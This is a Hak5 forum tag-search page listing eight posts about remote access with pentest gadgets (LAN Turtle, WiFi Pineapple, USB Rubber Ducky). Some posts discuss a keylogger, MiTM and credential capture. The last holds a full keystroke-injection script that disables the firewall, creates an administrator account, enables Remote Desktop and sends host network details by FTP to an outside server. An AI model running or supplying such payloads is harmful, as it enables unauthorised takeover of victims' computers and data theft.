Jump to content

Search the Community

Showing results for tags 'remote'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • New USB Rubber Ducky
    • WiFi Pineapple
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
    • WiFi Coconut
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • Legacy Devices
    • Classic USB Rubber Ducky
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests

Found 8 results

  1. Once I deploy the LAN Turtle, SSH into it using my own VPS, is it possible to run my own custom python scripts using the LAN turtle terminal. For example: I write my own python keylogger script and SCP it onto my LAN Turtle. Is there a way to run this? I'm unsure if this will work as this is connected via ethernet, not necessarily a normal USB stick. Thanks for your time.
  2. Here is the file - https://wiki.wireshark.org/SampleCaptures?action=AttachFile&do=get&target=dns-remoteshell.pcap And a screenshot - http://i64.tinypic.com/6gwu2v.jpg I have to analyse this file and answer several questions about it, like, small description of the events and weather this shows an attack, but I'm new to Wireshark so I'm a bit lost. If anyone could have a look and get back to me that would be great!
  3. Hello, I have successfully enabled AutoSSH on my Pineapple so I can remotely access the web interface (e.g. 164.84.38.155:666). However, I am having trouble SSH'ing into it via command line. I am trying to SSH into the exact same address which is working from the browser GUI (164.84.38.155:666), but it is not working. When I try: ssh root@164.84.38.155:666 I get this error: ssh: Could not resolve hostname 164.84.38.155:666: Name or service not known Is there a different address I'm suppose to SSH into or some other setting I need to configure? Thanks.
  4. Hey Darren and Seb, Before DEFCON (22), I thought Darren indicated he was working on an OpenVPN infusion. (Did that get lost?) I'd love this, as well as some SSH infusion enhancements. Is there any movement on this? Thanks. Ugh, I gave it the wrong title.
  5. Infusion Versions : [03/10/13 15:14] -Version 0.1 - First Release (▬ = Unsupported/Old ▬ = Devel ▬ = Current/Supported) Infusion Info : Commander is an infusion for the WiFi Pineapple Mark V that connects to user-specified IRC servers and allows you to control the pineapple over the IRC protocol. This allows a fast, easy to use and (hopefully) reliable text-based service. The front-end for the infusion is made up of PHP and JavaScript, while the back-end is programmed in Python, thus requiring Python as a dependency. Tips : -To see a list of command currently used by Commander, once connected to an IRC server type your prefix and then "commands", for example "+commands" or "!commands". Disclaimer : This infusion has the power, if used incorrectly you could seriously mess up your pineapple, which could lead to you having to reflash or other unwanted action. 'Dangerous' commands that you need to be careful with are "rm, mv, execute" etc. An "are you sure?" will be implemented in a later version. That said, Please have fun using this infusion! Features in Development : -User Authentication -Ask to continue on certain commands -Possibly change PRIVMSG to NOTIFY to prevent populated channel spam.
  6. Hello All, I'm trying to get my MkV to start airmon/airodump and ssh to my relay server. The airmon portion seems to be working swimmingly. The SSH/and HTTP proxy through my relay do not seem to be initiating however. Below is the line I have added to the configuration for dip 010. ifconfig wlan1 up; airmon-ng start wlan1; airodump-ng --write /sd/airodump.pcap --output-format pcap mon0; option ssh '-i /etc/dropbear/id_rsa -N -T -R 9434:localhost:1471 root@666.666.666.666'; option ssh '-i /etc/dropbear/id_rsa -N -T -R 999:localhost:22 root@666.666.666.666' Any ideas why it is not auto-connecting to the relay? Thanks in advance!!
  7. Hello, I recently acquired the Mark IV and it's a nice little box, but as one might expect not super power. Running items like sslstrip, mitm etc at the same time forces a watchdog reboot. However I don't actually need that on the Pineapple. My idea for the travel kit: - Could be used for full MiTM attacks - Could be used for WPA2-Enterprise credential capture Solution idea: connect a 3G modem (Huawei E220) in my case Configure a script to choose between WAN or 3G for connectivity (via cron, check 3g and wan. Choose wan over 3g, establish default route) Start openvpn to home network for: Radius connectivity Force all traffic over home network for MiTM & tcpdump With the exception of getting the E220 to work reliable I think I can manage most / all on a regular linux box. But if one has tips for Pineapple WiFi. As some of the questions are: - How to configure secondary SSID's (via uci or otherwise) - Any pointers / tips in general on the E220 (saw one topic, but it doesn't work - hard to find logs/debug info - for instance where is ppp log?) Thx, stijn
  8. OK all...Script for turning off the firewall, adding a user, making it an administrator, enabling remote access and sending (by FTP) the IP number to a server of your choice, then deleting the file. I am thinking something like netcat in the unix world? As always, Ideas? DELAY 2000 ESCAPE CONTROL ESCAPE DELAY 400 STRING cmd DELAY 400 CTRL-SHIFT ENTER DELAY 400 ALT y ENTER DELAY 400 STRING netsh firewall set opmode mode=disable ENTER DELAY 400 STRING net user /add username password ENTER DELAY 400 STRING net localgroup administrators username /add ENTER DELAY 400 STRING reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f ENTER DELAY 400 STRING reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f ENTER DELAY 400 STRING sc config TermService start= auto ENTER DELAY 400 STRING net start Termservice ENTER DELAY 400 STRING cd %USERPROFILE% ENTER DELAY 400 STRING ipconfig /all > number.txt ENTER DELAY 400 STRING ftp -i ftp server ENTER DELAY 400 STRING login name ENTER DELAY 400 STRING login password ENTER DELAY 600 STRING prompt ENTER DELAY 400 STRING prompt ENTER DELAY 400 STRING PUT number.txt ENTER DELAY 2000 STRING bye ENTER DELAY 400 STRING del number.txt ENTER DELAY 400 ALT SPACE STRING c
×
×
  • Create New...